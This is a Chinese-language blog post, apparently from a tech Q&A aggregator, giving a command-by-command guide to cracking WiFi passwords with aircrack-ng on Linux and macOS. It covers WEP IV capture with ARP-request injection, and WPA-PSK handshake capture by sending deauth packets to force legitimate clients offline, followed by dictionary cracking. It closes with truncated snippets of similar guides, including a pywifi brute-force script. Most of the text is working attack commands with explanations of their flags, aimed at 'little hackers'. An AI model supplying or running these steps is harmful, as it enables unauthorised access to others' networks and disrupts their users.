以前破wifi用的是cdlinux下的工具,最近換了mac研究了一下mac下的wifi破解工具,速度還行。不過現在到處都是免費wifi,還有好用的****,這些技術用的都比較少了,寫下來備用吧。
ifconfig -a檢視網絡卡
ifconfig wlan0 up載入網絡卡
iwconfig只檢視無線網絡卡
airmon-ng start 上面檢視的網絡卡名
monitor mode enabled on mon0便是已啟動監聽模式,監聽模式下介面卡名稱變更為mon0。
airodump-ng mon0 //mon0為之前已經載入並啟用監聽模式的無線網絡卡
airodump-ng
--ivs –w longas -c
6 wlan0 //抓取資料報
引數解釋:
--ivs 這裡的設定是通過設定過濾,不再將所有無線資料儲存,而只是儲存可用於破解的ivs資料報文,這樣可以有效地縮減儲存的資料報大小;
-c 這裡我們設定目標ap的工作頻道,通過剛才的觀察,我們要進行攻擊測試的無線路由器工作頻道為6;
-w 後跟要儲存的檔名,這裡w就是「write寫」的意思,所以輸入自己希望保持的檔名,如下圖10所示我這裡就寫為longas。那麼,小黑們一定要注意的是:這裡我們雖然設定儲存的檔名是longas,但是生成的檔案卻不是longase.ivs,而是longas-
01.ivs。
aireplay-ng -3 -b ap的mac -h 客戶端的mac mon0
引數解釋:
-3 指採用arprequesr注入攻擊模式;
-b 後跟ap的mac位址,這裡就是前面我們探測到的ssid為tplink的ap的mac;
-h 後跟客戶端的mac位址,也就是我們前面探測到的有效無線客戶端的mac;
最後跟上無線網絡卡的名稱,這裡就是mon0啦。
在等待片刻之後,一旦成功截獲到arp請求報文,我們將會看到如下圖13所示的大量arp報文快速互動的情況出現。
此時回到airodump-ng 會看到packets欄的數字在飛速遞增。
在抓取的無線資料報文達到了一定數量後,一般都是指ivs值達到2萬以上時,就可以開始破解,若不能成功就等待資料報文的繼續抓取然後多試幾次。注意,此處不需要將進行注入攻擊的shell關閉,而是另外開乙個shell進行同步破解。輸入命令如下:
aircrack-ng 捕獲的ivs檔案
最好對airodump-ng的oui庫進行公升級,先進入到aircrack-ng的安裝目錄下,然後輸入命令如下:
airodump-ng
-oui
-update
載入無線網絡卡的順序及命令部分,依次輸入下述命令
startx 進入到圖形介面
ifconfig –a 檢視無線網絡卡狀態
ifconfig wlan0 up 載入無線網絡卡驅動
airmon-ng start wlan0 啟用網絡卡到monitor模式
airodump-ng -c 6 –w longas mon0
引數解釋:
-c 這裡我們設定目標ap的工作頻道,通過觀察,我們要進行攻擊測試的無線路由器工作頻道為6;
-w 後跟要儲存的檔名,這裡w就是「write寫」的意思,所以輸入自己希望保持的檔名,這裡我就寫為longas。那麼,小黑們一定要注意的是:這裡我們雖然設定儲存的檔名是longas,但是生成的檔案卻不是longas.cap,而是longas-01.cap。
mon0 為之前已經載入並啟用監聽模式的無線網絡卡。
和破解wep時不同,這裡為了獲得破解所需的wpa-psk握手驗證的整個完整資料報,無線黑客們將會傳送一種稱之為「deauth」的資料報來將已經連線至無線路由器的合法無線客戶端強制斷開,此時,客戶端就會自動重新連線無線路由器,黑客們也就有機會捕獲到包含wpa-psk握手驗證的完整資料報了。此處具體輸入命令如下:
aireplay-ng -0 1 –a ap的mac -c 客戶端的mac wlan0
引數解釋:
-0 採用deauth攻擊模式,後面跟上攻擊次數,這裡我設定為1,大家可以根據實際情況設定為10不等;
-a 後跟ap的mac位址;
-c 後跟客戶端的mac位址;
在成功獲取到無線wpa-psk驗證資料報文後,就可以開始破解,輸入命令如下:
aircrack-ng
-w dic 捕獲的cap檔案
-w 後跟預先製作的字典,這裡是bt4下預設攜帶的字典。
aircrack-ng
主要用於wep及wpa-psk密碼的恢復,只要airodump-ng收集到足夠數量的資料報,aircrack-ng就可以自動檢測資料報並判斷是否可以破解
airmon-ng
用於改變無線網絡卡工作模式,以便其他工具的順利使用
airodump-ng
用於捕獲802.11資料報文,以便於aircrack-ng破解
aireplay-ng
在進行wep及wpa-psk密碼恢復時,可以根據需要建立特殊的無線網路資料報文及流量
airserv-ng
可以將無線網絡卡連線至某一特定埠,為攻擊時靈活呼叫做準備
airolib-ng
進行wpa rainbow table攻擊時使用,用於建立特定資料庫檔案
airdecap-ng
用於解開處於加密狀態的資料報
tools
其他用於輔助的工具,如airdriver-ng、packetforge-ng等
這裡我總結一下常用的流程,其實只有3個步驟。
airport -s
ssid 是 wifi名稱,rssi 是訊號強度,channel 是通道。
sudo airport en0 sniff 1
en0是網絡卡 1是要抓包的通道
抓包.cap檔案預設儲存在/tmp -w可以改變儲存路徑
aircrack-ng -w1.txt1.cap
1.txt是字典暴 1.cap是抓包檔案
可以看到cap包的內容,encryption中(0 handshake)是抓包失敗,(1 handshake)則是抓包成功。
記住成功的行數,index number of target network ?後面輸入行數,回車。
Linux kali系統下的wifi破解
準備前提 必須要有usb無線網絡卡 把可移動裝置 usb無線網絡卡 連入虛擬機器,開啟終端檢視當前無線網絡卡 網絡卡名 wlan0mon 啟用該網絡卡 探測附近wifi 測試選用pwr絕對值小的,越小wifi訊號越強,按ctrl z終止搜尋。記錄下目標wifi的bssid和ch 監聽路由器 root...
wifi破解程式
coding utf 8 import pywifi from pywifi import const import time 測試連線,返回鏈結結果 defwificonnect pwd 抓取網絡卡介面 wifi pywifi.pywifi 獲取第乙個無線網絡卡 ifaces wifi.inte ...
wifi密碼破解
iwconfig檢視網絡卡 啟動監聽模式,設定通道 airodump ng wlan0掃瞄周邊熱點 找疾風劍豪這個 得到mac位址 2e 15 e1 28 56 08 準備抓握手包 需要有人連上了目標wifi,把他踢下線,在他重新連線的時候進行抓包操作 airodump ng c 3 bssid 2...